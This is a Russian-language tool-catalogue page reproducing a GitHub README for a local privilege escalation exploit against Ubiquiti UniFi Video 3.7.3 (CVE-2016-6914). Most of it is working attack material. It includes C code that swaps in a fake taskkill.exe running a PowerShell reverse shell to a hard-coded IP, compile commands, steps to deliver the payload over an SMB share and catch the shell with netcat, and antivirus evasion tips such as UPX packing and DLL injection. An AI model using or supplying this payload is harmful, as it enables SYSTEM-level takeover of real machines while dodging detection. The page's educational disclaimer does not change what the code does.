Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2016-6914-UniFiVideo-LPE — CVE-2016-6914-UniFiVideo-LPE | Kitploit
Инструменты/GitHubGitHub/cybermonkx/cve-2016-6914-unifivideo-lpe
Повышение привилегийЭксплуатацияТестирование на ПроникновениеОбучение и ОбразованиеРазработка Полезной НагрузкиЭксплуатация Бинарных Файлов
GitHubcybermonkx/cve-2016-6914-unifivideo-lpe

CVE-2016-6914-UniFiVideo-LPE

CVE-2016-6914-UniFiVideo-LPE

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
1 год назадЕщё не проверено

CVE-2016-6914 - LPE PoC для Ubiquiti UniFi Video 3.7.3

🔥 Обзор

Этот репозиторий содержит proof-of-concept (PoC) для CVE-2016-6914, уязвимости локального повышения привилегий (LPE), затрагивающей Ubiquiti UniFi Video 3.7.3.

Злоумышленник с минимальными привилегиями может подменить доверенный бинарный файл (taskkill.exe) внутри C:\ProgramData\unifi-video\, чтобы выполнить вредоносный код с привилегиями SYSTEM.


⚡ Эксплуатация

Шаги эксплуатации

1️⃣ Замените taskkill.exe на вредоносный пейлоад (exploit.exe).
2️⃣ Дождитесь запуска UniFi Video Service или перезапустите его вручную.
3️⃣ Вредоносный пейлоад выполняется, предоставляя оболочку SYSTEM.


🚀 Включённые пейлоады

  • ✅ Reverse Shell на PowerShell
  • ✅ Reverse Shell на Netcat
  • ✅ Методы обхода AV

📜 Код PoC (Reverse Shell на PowerShell)

Этот пейлоад заменяет taskkill.exe и запускает reverse shell.

root@kitploit:~
#include <windows.h>

int main() {
    system("powershell -NoP -W Hidden -c \"$client = New-Object System.Net.Sockets.TCPClient('10.10.16.5',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();\"");
    return 0;
}
✅ Компиляция с помощью MinGW:
x86_64-w64-mingw32-gcc exploit.c -o exploit.exe
🛠️ Инструкции по использованию
1️⃣ Настройка SMB-шары (для удалённой доставки файла)
На Kali выполните:
impacket-smbserver share . -smb2support
2️⃣ Запуск Netcat-слушателя
nc -lvnp 4444
3️⃣ Доставка пейлоада на целевую машину
Выполните следующие команды PowerShell на целевой системе:
copy \\10.10.14.5\share\taskkill.exe C:\ProgramData\unifi-video\taskkill.exe
stop-service UnifiVideoService -Force
start-service UnifiVideoService
4️⃣ Получение оболочки SYSTEM
После выполнения на вашем слушателе откроется оболочка SYSTEM!

🛡️ Обход антивируса (AV)
Чтобы обойти базовое обнаружение AV, попробуйте: ✔️ Упаковка исполняемого файла (UPX):
upx --best --lzma exploit.exe
✔️ Использование альтернативных системных вызовов вместо system().
✔️ Внедрение в легитимные процессы с помощью DLL-инъекции.

⚠️ Отказ от ответственности
📢 Этот PoC предназначен только для образовательных целей!
🛑 Несанкционированное использование незаконно и наказуемо.
👨‍💻 Используйте его только законным и этичным способом.

Ссылка: https://www.exploit-db.com/exploits/43390
Скачать инструмент